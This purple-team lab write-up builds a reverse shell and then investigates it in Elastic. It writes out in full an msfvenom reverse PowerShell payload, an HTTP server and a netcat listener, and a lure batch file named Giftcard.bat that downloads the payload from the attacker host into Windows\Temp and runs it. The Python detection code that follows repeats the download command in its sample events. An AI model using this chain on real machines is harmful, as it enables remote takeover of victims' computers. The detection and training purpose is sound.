PURPLE TEAM

Creating a reverse shell payload with Kali Linux, delivering it to a Windows machine and establishing remote access, then analyzing the incident in Elastic, tracking its progression, and identifying potential indicators of compromise.

5/18/2024, 2 min read

First, create the payload using msfvenom:

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.5.7 lport=1337 > shell.txt

Start an HTTP server (port 8000 by default) so the payload can be fetched from the Windows machine:

python3 -m http.server

Start Netcat listening for the reverse shell:

nc -lvp 1337

Create a batch file, saved as Giftcard.bat on the Windows machine, that requests the payload from the Kali Linux (attacker) machine:

@ECHO off
powershell -Command "Invoke-WebRequest -URI http://10.10.5.7:8000/shell.txt -OutFile c:\Windows\Temp\shell.bat; c:\Windows\Temp\shell.bat"

When Giftcard.bat is clicked, it requests the payload from the HTTP server we set up, runs it, and the reverse shell gives us remote access to the Windows 10 machine.

With remote access to the Windows machine, we ran some basic commands to generate more traffic and activity for the logs.

With the attack complete, we move to the defense side: open Elastic, analyze the logs received, and add filters for the time window in which we executed the file.

Adding a filter to view logs with PowerShell activity.

In the first matching log we can see the .bat file that was clicked and started.
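As an added example (not part of the original post), the same triage can be scripted over process-creation events in the ECS field layout Elastic uses: flag the PowerShell download cradle, the cmd.exe (batch file) parent, and the script run from Windows\Temp, then pull out the URL and parent command an analyst pivots on. The sample events are constructed to mirror the Giftcard.bat chain, and the field names, regexes and KQL string are assumptions.

```python
import re
# Constructed sample events (not real telemetry) in the ECS layout Elastic uses for
# Windows process-creation logs; events 2-3 mirror the Giftcard.bat chain, event 4 is benign.
SAMPLE_EVENTS = [
    {"@timestamp": "2024-05-18T14:02:11Z", "process": {"name": "cmd.exe",
        "command_line": 'cmd.exe /c "C:\\Users\\victim\\Desktop\\Giftcard.bat"',
        "parent": {"name": "explorer.exe", "command_line": "explorer.exe"}}},
    {"@timestamp": "2024-05-18T14:02:12Z", "process": {"name": "powershell.exe",
        "command_line": 'powershell -Command "Invoke-WebRequest -URI http://10.10.5.7:8000/shell.txt '
                        '-OutFile c:\\Windows\\Temp\\shell.bat; c:\\Windows\\Temp\\shell.bat"',
        "parent": {"name": "cmd.exe", "command_line": 'cmd.exe /c "C:\\Users\\victim\\Desktop\\Giftcard.bat"'}}},
    {"@timestamp": "2024-05-18T14:02:13Z", "process": {"name": "cmd.exe",
        "command_line": "cmd.exe /c c:\\Windows\\Temp\\shell.bat",
        "parent": {"name": "powershell.exe", "command_line": "powershell -Command ..."}}},
    {"@timestamp": "2024-05-18T14:05:00Z", "process": {"name": "powershell.exe",
        "command_line": "powershell -NoProfile -File C:\\Scripts\\inventory.ps1",
        "parent": {"name": "explorer.exe", "command_line": "explorer.exe"}}},
]

# KQL equivalent of the Discover filter used in the post (ECS field names assumed).
KQL_FILTER = 'process.name : "powershell.exe" and process.command_line : *Invoke-WebRequest*'
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b", re.I)
TEMP_STAGING = re.compile(r"(\\windows\\temp\\|\\appdata\\local\\temp\\|%temp%)[^\s\";]*\.(bat|cmd|ps1|exe)\b", re.I)

def triage(event):
    """Return the reasons an event looks like the download-and-run chain (empty list if none)."""
    proc = event.get("process", {})
    name, cmd = proc.get("name", "").lower(), proc.get("command_line", "")
    parent = proc.get("parent", {}).get("name", "").lower()
    reasons = []
    if name == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        reasons.append("PowerShell download cradle")
    if name == "powershell.exe" and parent == "cmd.exe":
        reasons.append("PowerShell launched by cmd.exe (batch file)")
    if TEMP_STAGING.search(cmd):
        reasons.append("script executed from a writable temp directory")
    return reasons

def find_indicators(events):
    """Flag suspicious events and extract the IoCs (URL, parent command) an analyst pivots on."""
    hits = []
    for ev in events:
        reasons = triage(ev)
        if reasons:
            cmd = ev["process"].get("command_line", "")
            hits.append({"ts": ev["@timestamp"], "process": ev["process"]["name"], "reasons": reasons,
                         "urls": re.findall(r"https?://[^\s\"']+", cmd),
                         "parent_cmd": ev["process"].get("parent", {}).get("command_line", "")})
    return hits
```

Running `find_indicators(SAMPLE_EVENTS)` flags only the PowerShell download and the Temp execution; the parent command line of the first hit is what points back to Giftcard.bat, just as the first log in Elastic did.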